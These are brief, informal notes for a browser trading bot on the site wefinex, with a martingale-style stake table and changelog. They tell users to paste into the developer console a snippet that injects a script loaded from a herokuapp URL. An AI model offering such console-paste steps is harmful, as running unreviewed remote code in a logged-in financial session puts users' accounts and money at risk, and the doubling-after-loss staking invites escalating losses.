
FLow rule

var listRule = [
    "x->d",
    "d->x",
    "xxx->",
    "xxxx->",
    "xdxx->",
    "ddd->",
    "dddd->",
    "dxdd->",
];

var lostValueSet = {
    0: 1,
    1: 2,
    2: 4,
    3: 8,
    4: 16,
    5: 8,
    6: 16,
    7: 32,
    8: 16,
    9: 32,
    10: 64,
};
var setMaxWinTotal = 32;
var setMaxMinTotal = 32;


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console

---13/03
Random number from 3-9 second to trade

//check lost more > 3

13/4
var setMaxWinTotal = 32;
var setMaxMinTotal = 32;

18/04 update lostValueSet and set time trade 4-2s

var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v5-gapthep/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
